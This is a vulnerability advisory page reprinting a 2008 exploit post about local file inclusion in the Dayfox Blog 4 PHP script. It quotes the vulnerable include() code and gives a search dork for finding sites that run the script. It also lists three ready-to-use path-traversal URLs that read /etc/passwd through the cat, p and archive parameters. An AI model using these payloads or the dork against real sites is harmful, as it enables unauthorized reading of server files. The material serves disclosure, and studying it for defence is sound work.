Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities

2008-08-11 / 2008-08-12
Credit: virangar
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################## # # # ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::... # ######################################################################## Virangar Security Team www.virangar.net -------- Discoverd By :Virangar Security Team (hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from ISCN ----------------------------------- Download: http://www.dayfoxdesigns.co.nr Dork:Powered by Dayfox Designs This is a port of WordPress ------------------------------------------------------------------------------------------------- vuln codes in index.php: ############line 140-144################## if (isset($_GET["cat"])) { $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt'; if (file_exists($page)) { echo "<br /><a href=\"javascript: history.go(-1)\">&#60; Back</a>"; @include ("$page"); ############line 173-178################### if (isset($_GET["p"])) { $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt'; $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt'; if (file_exists($page)) { echo '<br /><a href="javascript: history.go(-1)">&#60; Back</a>'; include ("$page"); ############line 209-213################## if (isset($_GET["archive"])) { $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt'; if (file_exists($page)) { echo '<br /><a href="javascript: history.go(-1)">&#60; Back</a>'; include ("$page"); ---------------------------------------------------------------------------------------------------- exploit: http://site.com/index.php?p=../../../../../../../etc/passwd%00 http://site.com/index.php?cat=../../../../../../../etc/passwd%00 http://site.com/index.php?archive=../../../../../../../etc/passwd%00 -------- young iranian h4ck3rz

References:

http://www.securityfocus.com/bid/30538
http://www.milw0rm.com/exploits/6203


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top